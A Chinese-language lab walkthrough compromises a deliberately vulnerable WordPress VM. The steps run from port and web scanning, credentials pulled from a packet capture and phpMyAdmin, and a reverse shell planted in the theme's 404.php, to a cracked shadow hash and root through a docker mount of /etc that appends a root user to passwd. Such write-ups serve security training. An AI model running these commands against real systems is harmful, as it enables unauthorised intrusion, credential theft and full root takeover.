发现目标地址
1.目标主机网卡MAC地址为0800279564DD,如下所示;
2.使用以下命令扫描目标主机地址;
sudo netdiscover -r 192.168.2.1
192.168.2.134 08:00:27:95:64:dd 2 120 PCS Systemtechnik GmbH
信息收集
1.使用如下命令对目标进行端口扫描,如下所示;
nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 192.168.2.134
22/tcp closed ssh conn-refused
80/tcp open http syn-ack Apache httpd (PHP 7.3.17)
443/tcp open ssl/http syn-ack Apache httpd (PHP 7.3.17)
6777/tcp open ftp syn-ack vsftpd 3.0.3
2.使用如下命令对目标进行服务扫描,如下所示;
nikto -h 192.168.2.134
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.2.134
+ Target Hostname: 192.168.2.134
+ Target Port: 80
+ Start Time: 2020-06-29 21:15:21 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/7.3.17
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.2.134/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie wordpress_test_cookie created without the httponly flag
+ Cookie goto created without the httponly flag
+ Cookie back created without the httponly flag
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /secret/: This might be interesting...
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /wp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /wordpresswp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /: A Wordpress installation was found.
+ /wordpress: A Wordpress installation was found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7919 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time: 2020-06-29 21:21:53 (GMT-4) (392 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
3.根据nikto扫描结果得知,目标80端口使用wordpress框架,使用wpscan进行扫描,如下所示;
wpscan --url http://192.168.2.134 --enumerate ap,at,cb,dbe
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.2.134/ [192.168.2.134]
[+] Started: Mon Jun 29 21:18:56 2020
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Powered-By: PHP/7.3.17
| - X-Mod-Pagespeed: 1.13.35.2-0
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.2.134/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
4.使用dirb对目录进行扫描,得到如下结果;
https://192.168.2.134/tasks
5.根据提示可以猜测到用户名jarretlee,进行密码找回尝试;
6.根据提示可知账户正确,接下来根据提示寻找pcapng文件,经过构造,可以通过jarret.pcapng进行访问,如下所示;
http://192.168.2.134/jarret.pcapng
7.得到一个wireshark包,启动wireshark对文件进行分析;
8.经过查看流量包,得到如下信息;
jarretlee nopassword
jarretlee passwordis jarret
jarretlee jarretLEE
jarretlee NoBrUtEfOrCe__R3Qu1R3d__
9.使用账号密码登录尝试;
10.登录成功,发现草稿中存在一个base64密文,使用解密工具解密结果如下;
QGx3YXlzLUAtU3VwM3ItU2VjdXIzLXBAU1N3MFJkISE
@lways-@-Sup3r-Secur3-p@SSw0Rd!!
11.使用该密码登录wordpress不成功,登录phpmyadmin成功,如下所示;
12.查看wordpress用户密码,修改charleywalker密码,如下所示;
13.使用账号charleywalker和密码NoBrUtEfOrCe__R3Qu1R3d__进行登录,如下所示;
14.在404.php中写入恶意代码,如下所示;
获得初始shell
1.开启监听,构造反弹shell,对404页面访问尝试;
特权提升
1.使用如下命令获得TTY shell;
python3 -c 'import pty;pty.spawn("/bin/bash")'
2.查看用户列表发现该用户具有docker权限;
uid=1003(jeevan) gid=1005(jeevan) groups=1005(jeevan),115(docker)
3.使用用户jarretlee密码NoBrUtEfOrCe__R3Qu1R3d__切换用户到jarretlee,查看home文件,如下所示;
4.发现密文,使用base64解密,得到jeevan用户文件;
amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6
jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1:18430:0:99999:7:::
5.使用john进行破解,如下所示;
kali@kali:~/oscp/passwd/john$ sudo john --rules --wordlist=/usr/share/wordlists/rockyou.txt passswdhadow.txt
[sudo] password for kali:
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hannahmontana (jeevan)
1g 0:00:00:01 DONE (2020-06-30 22:34) 0.5617g/s 1438p/s 1438c/s 1438C/s slimshady..hassan
Use the "--show" option to display all of the cracked passwords reliably
Session completed
6.得到密码hannahmontana (jeevan),切换用户,使用docker提权;
docker run -v /etc/:/mnt -it alpine
cd /mnt
echo 'raj:$6$BiEAYF4pzDp5QJXH$00iURpImugngJWdAraUxBFfU76xovc6mwuQMe479uN28NesybQxOW7TiLxqrn99nJCfvISJtJiXgIjtTicF720:0:0:root:/root:/bin/bash' >> passwd
/mnt # exit
exit
jeevan@debian:/home/jarretlee$ su raj
su raj
Password: kali
root@debian:/home/jarretlee#
7.提权成功,查看证明文件。;
因为中间关机过,所以目标地址变化过,由于我是新手,有不对的地方欢迎大家指正。